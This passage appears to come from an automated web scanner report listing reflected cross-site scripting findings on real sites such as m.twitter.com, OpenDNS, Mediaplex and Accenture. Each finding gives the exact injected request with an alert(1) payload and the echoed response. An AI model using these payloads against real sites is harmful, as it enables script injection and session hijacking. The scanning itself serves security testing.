This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?89e1f"><script>alert(1)</script>2b044539dbc=1 HTTP/1.1
Host: ideabank.opendns.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __ktv=5926-ef2-1156-d97312c41bfbc05; __utmx=207386316.00012306182230551517:3:3; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=207386316.1290263893.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=http://opendns.com/; __utma=207386316.1945980142.1290263893.1290263893.1290263893.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104500


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="?page=2&amp;89e1f"><script>alert(1)</script>2b044539dbc=1">
...[SNIP]...

1.107. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be87"%3balert(1)//363c5691df7 was submitted in the mpck parameter. This input was echoed as 9be87";alert(1)//363c5691df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D4949634979be87"%3balert(1)//363c5691df7&mpt=494963497&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:51 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT
ETag: "6466be-b9e-4920c3dfb8800"
Accept-Ranges: bytes
Content-Length: 4081
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/3992-114624-33380-1?mpt=4949634979be87";alert(1)//363c5691df7\" target=\"_blank\">
...[SNIP]...

1.108. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc9e4"%3balert(1)//be7622a1d03 was submitted in the mpvc parameter. This input was echoed as fc9e4";alert(1)//be7622a1d03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&mpt=494963497&mpvc=fc9e4"%3balert(1)//be7622a1d03 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:54 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT
ETag: "6466be-b9e-4920c3dfb8800"
Accept-Ranges: bytes
Content-Length: 4057
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=fc9e4";alert(1)//be7622a1d03http://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&clickTag=fc9e4";alert(1)//be7622a1d03http://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&clickT
...[SNIP]...

1.109. http://img.mediaplex.com/content/0/3992/techtips_388_redhead_160x600.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/techtips_388_redhead_160x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f85d9"%3balert(1)//b20b8991dcf was submitted in the mpck parameter. This input was echoed as f85d9";alert(1)//b20b8991dcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072f85d9"%3balert(1)//b20b8991dcf&mpt=1151838072&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:54 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT
ETag: "4c57d5-b94-48a1927b79200"
Accept-Ranges: bytes
Content-Length: 4084
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/3992-114624-33380-1?mpt=1151838072f85d9";alert(1)//b20b8991dcf\" target=\"_blank\">
...[SNIP]...

1.110. http://img.mediaplex.com/content/0/3992/techtips_388_redhead_160x600.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/techtips_388_redhead_160x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52fe"%3balert(1)//bb2e7f7b03d was submitted in the mpvc parameter. This input was echoed as b52fe";alert(1)//bb2e7f7b03d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&mpt=1151838072&mpvc=b52fe"%3balert(1)//bb2e7f7b03d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:52:01 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT
ETag: "4c57d5-b94-48a1927b79200"
Accept-Ranges: bytes
Content-Length: 4060
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=b52fe";alert(1)//bb2e7f7b03dhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&clickTag=b52fe";alert(1)//bb2e7f7b03dhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&clic
...[SNIP]...

1.111. http://jobs.hrkspjbs.com/js.ashx [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.hrkspjbs.com
Path:   /js.ashx

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b3b'onerror%3d'alert(1)'651885c1226 was submitted in the loc parameter. This input was echoed as 97b3b'onerror='alert(1)'651885c1226 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /js.ashx?pid=2B9C484E4C084CE1A90E33EB9CE8FE7B&tl=99337983945&did=a1254&loc=http%3A//www.xml.com/pub/a/2003/07/23/extendingrss.html%3F99584--%253E%253Cscript%253Ealert%281%29%253C/script%253E0a38ce97934%3D197b3b'onerror%3d'alert(1)'651885c1226&referer=http%3A//burp/show/23 HTTP/1.1
Host: jobs.hrkspjbs.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Nov 2010 01:52:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
HRDS: 281
Set-Cookie: hr=60d7d6c3f78c44f794606403cf69e5e9; expires=Fri, 21-Jan-2011 01:52:40 GMT; path=/
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 695

hr_208355='';
hr_208355+="<map name='directconnect208355'><area shape='rect' coords='0,0,189,195' href='http://jobserver.hirereach.net/Landingpage.aspx?jobid=a6690a3a84244a699f4d7eb4135afb4e&pid=2b9c4
...[SNIP]...
&jobid=a6690a3a84244a699f4d7eb4135afb4e&cid=60d7d6c3f78c44f794606403cf69e5e9&did=a1254&loc=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=197b3b'onerror='alert(1)'651885c1226' alt='' title='Matched by Hire Reach'/>
...[SNIP]...

1.112. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.twitter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f14"><script>alert(1)</script>79a7c4dda04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?13f14"><script>alert(1)</script>79a7c4dda04=1 HTTP/1.1
Host: m.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 18:12:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1290363133-22708-20320
ETag: "bfebd129371ab9808d57aa079c920990"
Last-Modified: Sun, 21 Nov 2010 18:12:13 GMT
X-Runtime: 0.00750
Content-Type: text/html; charset=utf-8
Content-Length: 707
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=174.121.222.18.1290363133633094; path=/; expires=Sun, 28-Nov-10 18:12:13 GMT; domain=.twitter.com
Set-Cookie: guest_id=129036313363523026; path=/; expires=Tue, 21 Dec 2010 18:12:13 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: admobuu=c64bc7b04b5bb45d5dba8e834c130207; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCMXeom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiVlNzlmYzkzN2ZhODBkMDE0OWJhNTJkMWQ5YzljM2ZlYSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--eac5f95bacd4fb9510431d61a1ac5fae4eea0f2b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><head>
<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location="http://mobile.twitter.com" + a.replac
...[SNIP]...
<meta http-equiv="refresh" content="0;url=http://mobile.twitter.com/?13f14"><script>alert(1)</script>79a7c4dda04=1">
...[SNIP]...

1.113. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.twitter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0be6"-alert(1)-"b367d71ddc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b0be6"-alert(1)-"b367d71ddc1=1 HTTP/1.1
Host: m.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 18:12:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1290363138-1587-53133
ETag: "5a53462e51f159b5b02b0067f8e451fa"
Last-Modified: Sun, 21 Nov 2010 18:12:18 GMT
X-Runtime: 0.00681
Content-Type: text/html; charset=utf-8
Content-Length: 662
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=174.121.222.18.1290363138896016; path=/; expires=Sun, 28-Nov-10 18:12:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=129036313889880210; path=/; expires=Tue, 21 Dec 2010 18:12:18 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: admobuu=11ab92267356f360020e6179577499a7; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCFTzom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiU1YWYzZDMyMzc4ZmE4NDQwMmYwM2NkZjhmZGMzMjYyMiIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--111c6193ffe736b7da547ec1fa7d08577e08217b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><head>
<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location="http://mobile.twitter.com" + a.replace(/^([^\/])/,"/$1");}else{g.location="http://mobile.twitter.com/?b0be6"-alert(1)-"b367d71ddc1=1"}})(window);
//]]>
...[SNIP]...

1.114. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://myoutlook.accenture.com
Path:   /cgi-bin/accenture.cfg/php/enduser/acct_login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 725e2--><script>alert(1)</script>a0bf1b06325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?725e2--><script>alert(1)</script>a0bf1b06325=1 HTTP/1.1
Host: myoutlook.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:16:20 GMT
Server: Apache
P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:20 GMT
RNT-Time: D=109449 t=1290359780465908
RNT-Machine: 10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32005

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
<head>
<meta name="robots" content="noindex,nofollo
...[SNIP]...
<input type="hidden" name="725e2--><script>alert(1)</script>a0bf1b06325" value="1" />
...[SNIP]...

1.115. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://myoutlook.accenture.com
Path:   /cgi-bin/accenture.cfg/php/enduser/acct_login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8138"><script>alert(1)</script>e61542efaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?c8138"><script>alert(1)</script>e61542efaa3=1 HTTP/1.1
Host: myoutlook.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:16:18 GMT
Server: Apache
P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:18 GMT
RNT-Time: D=169171 t=1290359778593827
RNT-Machine: 04
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32003

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
<head>
<meta name="robots" content="noindex,nofollo
...[SNIP]...
<input type="hidden" name="c8138"><script>alert(1)</script>e61542efaa3" value="1" />
...[SNIP]...

1.116. http://newsroom.accenture.com/article_display.cfm [c parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /article_display.cfm

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3851d</script><a>912587d3fc5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:36 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120606;expires=Tue, 13-Nov-2040 17:16:36 GMT;path=/
Set-Cookie: CFTOKEN=d57053a1f586da0a-6F6FF274-B002-47E4-BDA1C7AF62624BD5;expires=Tue, 13-Nov-2040 17:16:36 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:36 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110"
s.channel="accenture/newsroom/pressreleases"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)doc
...[SNIP]...

1.117. http://newsroom.accenture.com/article_display.cfm [n parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /article_display.cfm

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19d7</script><a>acbabcf8454 was submitted in the n parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:55 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120862;expires=Tue, 13-Nov-2040 17:16:55 GMT;path=/
Set-Cookie: CFTOKEN=b524ef25b929b76b-6F703AA4-AC75-10FC-30F7881FF520A1A5;expires=Tue, 13-Nov-2040 17:16:55 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:55 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...

/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454"
s.channel="accenture/newsroom/pressreleases"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write
...[SNIP]...

1.118. http://newsroom.accenture.com/article_display.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /article_display.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 458c4</script><a>52134726541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

